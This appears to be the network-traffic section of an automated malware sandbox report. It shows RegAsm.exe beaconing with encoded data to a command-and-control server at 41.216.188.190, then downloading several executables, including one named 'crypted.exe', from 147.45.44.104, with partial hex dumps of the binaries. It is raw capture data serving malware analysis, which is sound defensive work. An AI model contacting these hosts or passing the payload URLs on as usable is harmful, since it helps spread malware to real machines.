                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:33.017230034 CEST204OUTGET /api/wp-ping.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 41.216.188.190
                                                                                                                                                                                                                                Sep 21, 2024 13:33:33.773772955 CEST259INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:33 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 6
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 66 69 73 68 31 35
                                                                                                                                                                                                                                Data Ascii: fish15
                                                                                                                                                                                                                                Sep 21, 2024 13:33:37.361995935 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 133
                                                                                                                                                                                                                                Host: 41.216.188.190
                                                                                                                                                                                                                                Sep 21, 2024 13:33:37.362059116 CEST133OUTData Raw: 64 61 74 61 3d 35 44 49 59 41 4a 49 5f 6f 47 71 6c 69 5a 30 47 4d 61 72 39 6e 53 53 58 66 52 6d 31 66 37 68 47 4d 6b 4c 34 36 75 36 6c 53 33 47 76 34 2d 42 38 56 4c 30 36 36 77 44 77 65 45 71 58 78 38 30 2d 38 62 79 4c 6f 6a 64 75 45 65 71 47 42
                                                                                                                                                                                                                                Data Ascii: data=5DIYAJI_oGqliZ0GMar9nSSXfRm1f7hGMkL46u6lS3Gv4-B8VL066wDweEqXx80-8byLojduEeqGB_dL9d4AO3a05z7k9_9ylkjAwjOBeXKEjhac8Dj_aFRTZwMYnhRF
                                                                                                                                                                                                                                Sep 21, 2024 13:33:38.069564104 CEST362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:37 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 108
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 6d 50 61 2b 70 56 39 67 4b 50 6e 6e 43 75 78 66 51 39 68 39 6a 4e 64 43 61 36 65 59 72 41 2f 68 33 79 70 35 43 73 73 51 43 46 35 43 48 50 38 79 72 57 63 38 34 61 61 48 61 2b 61 56 46 77 79 78 68 49 54 47 6b 2f 73 72 64 65 41 47 6e 6a 41 66 41 42 77 59 36 2b 6b 75 75 78 50 52 45 37 70 33 73 44 51 36 37 4a 79 34 34 47 51 3d
                                                                                                                                                                                                                                Data Ascii: mPa+pV9gKPnnCuxfQ9h9jNdCa6eYrA/h3yp5CssQCF5CHP8yrWc84aaHa+aVFwyxhITGk/srdeAGnjAfABwY6+kuuxPRE7p3sDQ67Jy44GQ=
                                                                                                                                                                                                                                Sep 21, 2024 13:33:38.201370001 CEST276OUTPOST /api/wp-admin.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 133
                                                                                                                                                                                                                                Host: 41.216.188.190
                                                                                                                                                                                                                                Sep 21, 2024 13:33:38.201390028 CEST133OUTData Raw: 64 61 74 61 3d 6a 39 67 43 35 74 2d 61 37 71 7a 41 34 35 39 38 64 4f 56 37 75 4a 4f 76 41 72 62 62 5a 73 30 64 41 68 4d 4c 4b 6d 39 79 43 75 61 54 42 50 30 78 4f 50 34 46 4a 5a 32 45 6a 53 5f 73 4c 77 45 74 71 55 6f 63 2d 61 51 50 6c 2d 56 4f 5a
                                                                                                                                                                                                                                Data Ascii: data=j9gC5t-a7qzA4598dOV7uJOvArbbZs0dAhMLKm9yCuaTBP0xOP4FJZ2EjS_sLwEtqUoc-aQPl-VOZWPDT6z5fTe0LCvGnz4z1yCJiizEA90u9K02kTIWzfeMFZHuYXpb
                                                                                                                                                                                                                                Sep 21, 2024 13:33:39.208544016 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:38 GMT
                                                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                Content-Length: 2368
                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Data Raw: 52 34 31 64 44 57 69 4b 64 42 2f 64 76 64 72 35 61 6b 4f 57 38 74 6e 6f 56 30 69 75 64 53 34 63 44 39 51 49 32 74 62 74 4e 55 76 58 31 38 74 71 59 47 62 69 74 6d 78 31 79 43 41 61 58 4b 5a 7a 59 47 73 58 5a 71 47 54 39 6c 75 74 65 68 44 65 75 4a 48 36 55 59 54 31 7a 45 56 49 6d 38 34 54 52 64 4b 75 79 69 74 56 67 69 6b 32 4d 4c 69 73 37 4d 61 56 52 6b 72 33 37 5a 50 48 47 42 32 62 61 58 66 30 75 75 52 79 36 54 45 36 2b 6b 48 51 47 34 65 48 38 35 66 35 73 4b 65 50 79 70 78 32 44 36 47 33 4a 32 59 49 45 4f 6f 6e 48 54 4e 71 67 2b 4e 66 77 4e 51 37 34 77 73 49 42 71 78 77 57 6d 35 39 75 4b 2f 55 6f 36 78 6e 79 57 47 44 2f 38 4e 33 53 69 37 53 4c 44 76 6e 31 57 61 4c 49 4a 6f 63 49 6e 4b 55 76 67 75 33 31 4d 57 70 74 70 43 61 35 57 44 54 36 65 75 52 59 47 70 72 35 4f 4c 4a 50 63 57 49 46 2f 7a 30 46 2f 32 50 41 4c 75 37 55 7a 65 64 32 32 6c 6a 30 71 33 49 56 6e 32 48 43 57 34 5a 72 34 47 38 78 4b 59 61 30 71 34 4a 47 50 58 45 38 30 4c 31 6c 48 76 76 6f 71 6b 63 43 5a 56 53 72 48 32 57 68 7a 33 56 7a 62 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: R41dDWiKdB/dvdr5akOW8tnoV0iudS4cD9QI2tbtNUvX18tqYGbitmx1yCAaXKZzYGsXZqGT9lutehDeuJH6UYT1zEVIm84TRdKuyitVgik2MLis7MaVRkr37ZPHGB2baXf0uuRy6TE6+kHQG4eH85f5sKePypx2D6G3J2YIEOonHTNqg+NfwNQ74wsIBqxwWm59uK/Uo6xnyWGD/8N3Si7SLDvn1WaLIJocInKUvgu31MWptpCa5WDT6euRYGpr5OLJPcWIF/z0F/2PALu7Uzed22lj0q3IVn2HCW4Zr4G8xKYa0q4JGPXE80L1lHvvoqkcCZVSrH2Whz3Vzbd4HowVj+AWc3arxGNr3Mkr91Un7xlHJKE4kWXG1RYb8bVqEdTEeXhQAYC+C2EKqgP1QyTqlNAlFJNLmgkvDejVy2JECsHxiALy5gplyh46vzgq6NTULmwrZJiWpbWG0fLiDPtQKbxFZU3Nd3c12KC+iWlg8TedgK+JSrruqGXFP0HeQJtuW3BI+RSZFbPj3sTUS5WI2+MyPsWuG4b1jYSDybNW6jn405mVzne2peYwNs5xZDeyvq1vzUKCNTmsqvahkS3ArN/1vInOOEXcQnP/+7yRmxCUBW6zykLTqii/4Gfo3p4JiSQ7PPp1Q0jF92dqUEuWjYZ3fhIRBD/uBqBzgfkeLIWisEFhB3+cxP4UCpezlLV19en1t4y7G4i9+JfNPLFhWmmdxKVVwWYiFuZ6YDe/wSrYaIuirrYo4e7wh0RISjPo3Ph0Bl8c9g5OzWpuEHizyWVdZG+z/cJA81GuVfLDy/EWzaNZqTu46jSu9Xwqiw8xcuQIZawF17lUMYZIgiXnijCkyLZovHxW7dUKb0sMwEPbPd9Wq/Ey0zaNXYSpwpv7QBsVQqyIkHJBlNo59MO7UKmfq11orb61Ufmm27c4P2bLDqo+bU/yc7Zkp5feKT56QGhOETfS1Rb357n7Q
                                                                                                                                                                                                                                Sep 21, 2024 13:33:39.208564043 CEST1236INData Raw: 39 41 76 37 56 78 63 7a 52 4b 38 59 46 54 77 35 52 4d 75 76 75 7a 34 6d 6b 45 4b 66 45 6a 31 58 78 63 36 6d 58 45 63 77 4c 53 4c 64 4c 72 44 5a 64 6f 65 2b 78 2f 75 2f 30 72 50 65 55 59 43 31 4f 4e 35 41 69 37 76 7a 63 50 43 50 39 75 68 2f 41 7a
                                                                                                                                                                                                                                Data Ascii: 9Av7VxczRK8YFTw5RMuvuz4mkEKfEj1Xxc6mXEcwLSLdLrDZdoe+x/u/0rPeUYC1ON5Ai7vzcPCP9uh/Azt7k965TQEC0q3EMVTJkIWpGdeuyvxISuszvcOxChQD9/NUM6f7MFRiSWc3gehk4BlND6tmV0ueW3nfRXUvpRY/p/8vNFzOrQfSNKPLDT+iUKYpCIFE9EEmC4PwiOFm6acZvQujx9ZdObF9ggWtrNwDtbKqD6aQgr1
                                                                                                                                                                                                                                Sep 21, 2024 13:33:39.208578110 CEST151INData Raw: 6d 79 50 43 4d 31 6c 77 6a 51 36 62 35 66 33 47 4c 36 6e 65 4a 57 35 31 32 55 46 41 6c 74 39 6d 49 56 2b 4c 43 6d 63 61 4a 68 45 49 59 6d 50 32 5a 56 4e 68 53 4e 37 38 30 39 68 69 6a 69 4f 6b 41 65 31 66 4d 55 51 56 52 45 4f 4b 47 57 43 4f 56 47
                                                                                                                                                                                                                                Data Ascii: myPCM1lwjQ6b5f3GL6neJW512UFAlt9mIV+LCmcaJhEIYmP2ZVNhSN7809hijiOkAe1fMUQVREOKGWCOVG4Vm++g9AqcgjDesJneoIjfFFc7jVMa+NViXUqNCxJRJM1YJJxV3OvcJzlPFFrpQwXO34q


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.949708147.45.44.104806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.185796022 CEST217OUTHEAD /prog/66e705d09b33c_jack.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.816390991 CEST311INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 4249600
                                                                                                                                                                                                                                Last-Modified: Sun, 15 Sep 2024 16:05:36 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66e705d0-40d800"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.817049026 CEST227OUTHEAD /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.109206915 CEST311INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 3037032
                                                                                                                                                                                                                                Last-Modified: Thu, 19 Sep 2024 05:16:47 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66ebb3bf-2e5768"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.109826088 CEST220OUTHEAD /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.293134928 CEST312INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 11496960
                                                                                                                                                                                                                                Last-Modified: Wed, 18 Sep 2024 05:25:37 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66ea6451-af6e00"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.293427944 CEST238OUTHEAD /yuop/66eea6336b153_app16540406983468141987.exe#1 HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.483829021 CEST309INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 331640
                                                                                                                                                                                                                                Last-Modified: Sat, 21 Sep 2024 10:55:47 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66eea633-50f78"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.484131098 CEST223OUTGET /yuop/66edb89bc4073_crypted.exe#xin HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675546885 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 361336
                                                                                                                                                                                                                                Last-Modified: Fri, 20 Sep 2024 18:02:03 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66edb89b-58378"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d b7 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 50 05 00 00 08 00 00 00 00 00 00 ee 6e 05 00 00 20 00 00 00 80 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 6e 05 00 53 00 00 00 00 80 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 5a 05 00 78 29 00 00 00 a0 05 00 0c 00 00 00 60 6d 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfPn @ `nSZx)`m H.textN P `.rsrcR@@.relocX@BnH^$spkTa|K?wN-mEC9-#f=5spJzs_4vZUOwbnesRv@sO4] VLTV[XvF|hI*$<gbv-Cm<[6R8!m'?jW`JI!k,O<9WXLEq !Q$@,99~%(\|B#a wZV9kFZl[OtGz&c
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675601006 CEST1236INData Raw: 0d 79 6b 26 85 4e 87 92 3b ca 93 07 cf d8 f9 b2 83 e6 54 f8 66 68 d5 84 5d 5a d0 25 83 ca fd 81 29 04 3d 03 c5 a7 a1 2d c1 49 67 0d d0 54 14 8b 15 d9 8d 2a 31 cf 21 a1 a4 7a 80 ca cb 45 a3 a2 a9 39 87 be b0 e3 cb 78 e6 f5 3b c5 41 6d 12 45 f9 15
                                                                                                                                                                                                                                Data Ascii: yk&N;Tfh]Z%)=-IgT*1!zE9x;AmE(r&Z!r_+=zwC6V3lk#fk^vrTGWK8FP8TROZ&zmz*!7I<BeDa5p0x~U b
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675636053 CEST1236INData Raw: fe b0 b1 d7 aa c7 5f ce cd 9e 2a 2f 2a c2 ac bc 04 5e 50 46 af ab 97 b4 16 8c 71 7d 9a 36 72 59 63 05 a9 d6 0e f2 fe 83 10 53 d8 29 76 ff 8c 4e fd bf ab 34 bc bd 4b 39 55 50 c2 5d cf 6f 33 bb 23 cb f9 a0 cd 22 7c e7 e4 d6 92 6d 7c 8e c3 00 25 11
                                                                                                                                                                                                                                Data Ascii: _*/*^PFq}6rYcS)vN4K9UP]o3#"|m|%%{=Ug[ YX]S1[je1C\Zt[TM&iHB$ce\]+cZ6hfu4g^7hj/\6tZAkZ+PV:Gk
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675668955 CEST1236INData Raw: 4c 1b 2a 49 13 45 c4 c2 1f 20 dc cf f6 c1 1d a6 9e 79 02 0f ed 34 76 07 99 15 89 04 77 da d1 f9 2b 99 34 59 4f 82 8a 8c d8 24 71 ac 6c b2 ae f1 3e 11 de b0 90 3d 01 7b 46 b7 07 9f 9a 27 1d 1e 14 f0 eb 8a 76 9f dc 96 97 98 f0 60 c4 19 15 15 58 a0
                                                                                                                                                                                                                                Data Ascii: L*IE y4vw+4YO$ql>={F'v`X*[z[S;?>`]K'#|`N/^+,%XuK)0>\EB$bbh@w.Vt4>=w~ MTK@&SSYyb>-Z6:Xy!x~
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675704002 CEST1236INData Raw: f3 96 4c ec 8a 5c c0 68 63 a2 5e 40 99 a5 58 9b 92 dc 68 93 53 c4 30 01 a0 e2 34 53 d9 83 e9 42 22 d1 ba e6 a2 56 a3 f3 de 98 89 6a d1 e0 9e 10 7d 15 9e fe 39 04 87 43 8d 18 49 85 1a 48 5f b2 41 11 98 5d 9a 33 07 e8 12 36 48 2f 30 6b 37 ac 96 b8
                                                                                                                                                                                                                                Data Ascii: L\hc^@XhS04SB"Vj}9CIH_A]36H/0k7)ydufQbI~GEZOC1+r!3D1o4GIVBL:x{|1*(~ii9jN{p,:6v~M.+!#M+iSUvaW<=
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675762892 CEST1236INData Raw: 3a 0d 55 a5 9e dd 66 e3 1e 9b 3a 69 7e fa d1 c0 bc 88 81 a8 82 49 d3 51 a9 29 70 e1 ec e9 1c a6 4d 3e ff 45 b6 f9 4d c9 90 c4 72 f5 ce 0a 58 ea e3 4c 45 10 eb 15 09 36 27 f3 a2 9a bb 1c 3d f0 7c 32 a7 cf 88 cc 4a 7f 2a cc 2c 54 b8 aa dc 4c 56 1f
                                                                                                                                                                                                                                Data Ascii: :Uf:i~IQ)pM>EMrXLE6'=|2J*,TLV.?8o~w2~w8(ws'NJ(Yh_aNJG@V]jm/\l+!^FZ8WUEEV}hj2zQriJCE5,fzYj*RQ*iN_w
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675815105 CEST1236INData Raw: c7 16 48 cf 70 50 db a0 59 01 59 fe bb f4 7a ac 92 d0 e5 8a 89 15 0a fa dd 3d 3d 00 eb 15 08 77 6c 9d 16 7e 5d f3 10 3c 54 7d ca 67 8e 3c ac 1f 5b ff b5 bd 73 ec a1 3a 22 18 e4 c2 2a 1e 8f cf 13 4f ab 61 2a 57 bb de 13 d2 a7 2b 9e 7f 8b ac 56 1d
                                                                                                                                                                                                                                Data Ascii: HpPYYz==wl~]<T}g<[s:"*Oa*W+VW;V`gafB}o6@^'I__-aFeVXVRWU-TT09=O:/F|X)?j.`H>'#sv^Qb>K#GKu)SH/C
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675848961 CEST1236INData Raw: bd 90 19 ee f5 b2 9e b3 48 dc fa 2d c5 5e 8c 44 50 27 9d 68 6b 0c 87 bd 68 87 af 23 3f 80 ae 7d e5 78 e9 a1 3b b7 a0 97 39 df 6b a6 04 01 b8 97 a0 46 14 20 35 86 fa b5 51 8c a6 e5 69 bb 59 f3 08 bd e2 ec b9 91 1e 3f f1 d9 dc 8d 74 07 00 22 82 6a
                                                                                                                                                                                                                                Data Ascii: H-^DP'hkh#?}x;9kF 5QiY?t"jPSX@p=!L9462[6L'Mq_Fu4x2a Lnh)@D!ng' 1}ri1868 R*R[zV];"(@
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675884008 CEST1236INData Raw: 75 56 7d 7a e1 41 3b cb 20 ab c0 f6 26 2e 8a 6c d1 08 36 c2 db 18 30 bb 9e 0b fc 7d ff de 72 c0 45 e6 e5 48 4b b5 08 bf b8 28 b3 d8 63 04 78 13 08 32 93 25 a0 20 54 d6 b4 65 63 b9 18 1f 2e 36 4c 6a b3 c8 95 c4 e1 57 c9 97 a9 94 29 18 e4 91 98 7f
                                                                                                                                                                                                                                Data Ascii: uV}zA; &.l60}rEHK(cx2% Tec.6LjW)n9ZeZ7vqB&LI!-&w=SO7Gf)tR'{q0QC+3+o[~9Ax \04~,^=hOFI>Er|
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675916910 CEST1236INData Raw: 28 b9 36 75 08 2c e4 6a 8f 69 0c b0 b2 2f 02 65 83 8d ea 62 26 05 60 ea 38 10 5b be 06 05 1a 48 92 20 3c db 3f f5 ef 85 ce ba 6c 0a ea 18 ac 2e 91 f5 bf ea fe 6b e5 31 1a d1 f4 e8 53 b0 31 46 b9 54 4c ed f5 a8 f5 4a e7 86 5d 91 66 1d 07 bc 0f 3b
                                                                                                                                                                                                                                Data Ascii: (6u,ji/eb&`8[H <?l.k1S1FTLJ]f;9GI(#vFv Qw\c H+9IC5fj !"|qTxK6bJ9}\(L:3fRLR7YE'%X
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.675951004 CEST1236INData Raw: 73 22 d9 12 37 9d a7 2c 74 05 c3 89 63 a3 07 10 b7 c6 fe e6 97 64 09 51 0f 93 18 28 6b 0d 2f c7 24 1e de 03 c4 b1 a0 37 0f 09 72 7a b5 11 cc cc ea f4 b5 14 42 b7 e3 c1 09 70 13 62 4f 4c a6 ed 01 ee 0b b8 f6 5a c3 f4 17 8e f5 23 f1 4d b1 a9 8e ac
                                                                                                                                                                                                                                Data Ascii: s"7,tcdQ(k/$7rzBpbOLZ#M7dWE8rzm ]'bz{}{[]ee>g*UR2Dp)L%K[k_S2>I~o&z7}:8[RKe2D-W#y
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.139751911 CEST226OUTGET /lopsa/66ebb3bf78bd6_Send.exe#111us300 HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:42.362787008 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:42 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 3037032
                                                                                                                                                                                                                                Last-Modified: Thu, 19 Sep 2024 05:16:47 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66ebb3bf-2e5768"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ba f7 20 98 fe 96 4e cb fe 96 4e cb fe 96 4e cb f7 ee dd cb ec 96 4e cb 60 36 89 cb ff 96 4e cb 1b cf 4b ca fc 96 4e cb 23 69 80 cb fa 96 4e cb 23 69 85 cb f0 96 4e cb c5 c8 4d ca f8 96 4e cb c5 c8 4a ca f0 96 4e cb c5 c8 4b ca df 96 4e cb c5 c8 4f ca f8 96 4e cb d9 50 35 cb fc 96 4e cb 69 c8 4f ca d3 96 4e cb fe 96 4f cb 3a 9d 4e cb 69 c8 4b ca a1 96 4e cb 69 c8 4e ca ff 96 4e cb 6c c8 b1 cb ff 96 4e cb fe 96 d9 cb ff 96 4e cb 69 c8 4c ca ff 96 4e cb 52 69 63 68 fe 96 4e cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 81 9f 25 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZ@8!L!This program cannot be run in DOS mode.$ NNNN`6NKN#iN#iNMNJNKNONP5NiONO:NiKNiNNlNNiLNRichNPEL%`8$P@.!@%T\ f>.h)TD*)@P..text@8 `.rdata0P(<@@.datand@.tls@.gfids@@.rsrcf h@@
                                                                                                                                                                                                                                Sep 21, 2024 13:33:44.490238905 CEST227OUTGET /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:44.675597906 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:44 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 418816
                                                                                                                                                                                                                                Last-Modified: Sat, 21 Sep 2024 07:43:45 GMT
                                                                                                                                                                                                                                Connection: keep-alive
